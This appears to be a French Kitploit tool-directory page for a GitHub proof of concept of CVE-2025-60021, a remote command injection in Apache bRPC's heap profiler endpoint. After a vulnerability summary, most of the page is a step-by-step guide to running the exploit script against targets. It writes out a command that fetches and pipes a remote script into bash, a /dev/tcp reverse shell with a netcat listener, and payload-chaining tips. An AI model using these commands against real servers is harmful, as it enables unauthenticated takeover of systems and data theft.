Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Ashwesker-CVE-2025-60021 — CVE-2025-60021 | Kitploit
Outils/GitHubGitHub/mefhika120/ashwesker-cve-2025-60021
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationRed TeamingDéveloppement de Charges Utiles
GitHubmefhika120/ashwesker-cve-2025-60021

Ashwesker-CVE-2025-60021

CVE-2025-60021

Voir le dépôt
28il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛑 CVE-2025-60021 — Apache bRPC Injection de commandes à distance

G_GmijOXQAAX5iE

📌 Vue d'ensemble

CVE-2025-60021 est une vulnérabilité critique d'injection de commandes à distance découverte dans le service intégré de profilage du tas (/pprof/heap) d'Apache bRPC dans les versions antérieures à 1.15.0, permettant à des attaquants non authentifiés d'exécuter des commandes système arbitraires. ([NVD][1])


🔓 Détails de la vulnérabilité

AttributInformations
Nom / IDCVE-2025-60021
ProduitApache bRPC (toutes plateformes)
Versions affectées< 1.15.0
Date de publication16 janv. 2026 ([NVD][1])
Type de vulnérabilitéInjection de commandes à distance (CWE-77) ([NVD][1])
Point d'accès/pprof/heap
DéclencheurParamètre extra_options non assaini
Cause racineEntrée non validée avant exécution en tant que commande OS ([openwall.com][2])

❗Les attaquants peuvent injecter des commandes à distance en manipulant simplement ce paramètre de profilage.


🚨 Sévérité & Risque

🔥 Niveau de sévérité : Critique 📊 Score CVSS v3.1 de base : 9.8 / 10 Vecteur : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H ([INCIBE][3])

Catégorie d'impactEffet
ConfidentialitéÉlevé
IntégritéÉlevé
DisponibilitéÉlevé
Vecteur d'attaqueRéseau
PrivilègesAucun requis
Interaction utilisateurAucune nécessaire([INCIBE][3])

👉 Cela signifie que les attaquants peuvent exécuter des commandes arbitraires à distance sans connexion — un scénario catastrophe pour les services exposés.


🧠 Analyse technique

🔍 Comment ça fonctionne

  1. Exposition du profilage du tas : bRPC expose un point d'accès de profilage (/pprof/heap) destiné à l'analyse mémoire (jemalloc). ([openwall.com][2])
  2. Bogue de traitement des entrées : Le point d'accès accepte un paramètre extra_options. Au lieu de l'assainir, bRPC le transmet directement au shell OS. ([openwall.com][2])
  3. Injection de commandes : Un acteur malveillant crée une entrée incluant des commandes système → le service les exécute. ([CVE Details][4])

Guide pas à pas pour utiliser le script PoC CVE-2025-60021

Ceci suppose que vous avez enregistré le script sous le nom CVE-2025-60021.py (même si la vraie CVE est 2025-60021 — n'hésitez pas à le renommer). C'est un script Python 3 pour démontrer la vulnérabilité d'injection de commandes à distance dans le profileur de tas d'Apache bRPC. Exécutez-le uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation écrite explicite — l'exploitation sans autorisation est illégale.

Prérequis

  1. Environnement Python : Assurez-vous d'avoir Python 3 installé (par ex., 3.6+). Le script utilise des modules intégrés plus requests et argparse (qui sont standards ou faciles à installer).

  2. Installer les dépendances : Si ce n'est pas déjà fait, installez la bibliothèque requests :

    pip install requests
    
  3. Configuration de la cible : Vous avez besoin d'un serveur Apache bRPC vulnérable :

    • Version < 1.15.0.
    • Profileur de tas activé (vérifiez la configuration du serveur ; il est souvent activé par défaut dans les configurations de développement).
    • Accessible via le réseau (par ex., http://localhost:8060 ou une IP/port distants). Si vous testez localement, configurez une instance bRPC vulnérable (par ex., via Docker ou construction source — consultez la documentation d'Apache bRPC).
  4. Permissions : Exécutez avec sudo uniquement si nécessaire pour l'accès réseau ou les privilèges ; sinon, un simple python3 suffit.

Étape 1 : Enregistrer le script

Copiez le code PoC que j'ai fourni précédemment dans un fichier nommé CVE-2025-60021.py. Rendez-le exécutable si vous le souhaitez :

chmod +x CVE-2025-60021.py

Étape 2 : Comprendre les arguments

Le script prend deux arguments positionnels obligatoires :

  • target : L'URL du serveur bRPC vulnérable (par ex., http://192.168.1.100:8060 ou http://targets:8060 — corrigez les éventuelles fautes de frappe comme un schéma manquant ou un hôte invalide).
  • cmd : La commande à exécuter sur la cible (par ex., "id" pour les informations utilisateur, ou quelque chose de plus complexe comme "curl http://votre-serveur/reverse-shell.sh | bash" pour un reverse shell). Utilisez && ou ; pour enchaîner plusieurs commandes.

Étape 3 : Exécuter le script

Ouvrez un terminal (par ex., sur Kali Linux comme vous l'utilisez) et exécutez-le avec votre cible et votre commande. Exemples de commandes :

  • Test de base (obtenir des informations système) :

    sudo python3 CVE-2025-60021.py http://targets:8060 "id && whoami && uname -a"
    
  • Exemple de reverse shell (remplacez votre-ip-écouteur et le port ; configurez d'abord un écouteur comme nc -lvnp 4444) :

    sudo python3 CVE-2025-60021.py http://targets:8060 "bash -i >& /dev/tcp/votre-ip-écouteur/4444 0>&1"
    
  • Si vous utilisez HTTPS ou un port différent, ajustez l'URL en conséquence (par ex., https://target:443 — le script le gère, mais ajoutez --insecure en cas de problème de certificat).

Étape 4 : Interpréter la sortie

Indicateurs de succès :

  • L'exploit a probablement réussi ! (200 OK)
  • Sortie de commande possible dans le corps de la réponse (par ex., uid=0(root)... si id a été exécuté).
  • Pour les commandes sans sortie (par ex., écriture de fichiers ou shells), vérifiez le serveur cible (logs, processus) ou votre écouteur.

Indicateurs d'échec (comme ce que vous avez vu) :

  • Code d'état 404 obtenu — peut-être non vulnérable ?
  • Messages d'erreur comme "[E1002] Heap profiler is not enabled" signifient que le point d'accès n'est pas actif — activez-le sur la cible ou trouvez une autre instance vulnérable.
  • Timeouts ou erreurs de connexion : Cible injoignable, pare-feu bloquant, ou mauvais port.
  • Si aucune sortie ne fuit, la commande s'exécute silencieusement sur le serveur.

Étape 5 : Résolution des problèmes courants

  • Erreur 404 : Profileur de tas désactivé. Activez-le dans la configuration bRPC (par ex., --enable_heap_profiler=true) et redémarrez le serveur.
  • Erreur argparse : Argument cmd oublié — incluez-le toujours.
  • Pas de sortie dans le corps de la réponse : Certaines commandes ne produisent pas de stdout. Utilisez celles qui en produisent (par ex., echo "test" > /tmp/proof.txt) et vérifiez le fichier sur la cible.
  • Privilèges : Si le processus bRPC s'exécute en tant que non-root, les commandes sont limitées aux permissions de cet utilisateur.
  • Ajustements de la charge utile : Si ; ne fonctionne pas, essayez && ou | pour l'enchaînement. Encodez les caractères spéciaux dans l'URL si nécessaire (le script gère la plupart).
  • Test local : Lancez un conteneur Docker vulnérable pour bRPC afin de vérifier sans risquer des systèmes réels.
Télécharger l’outil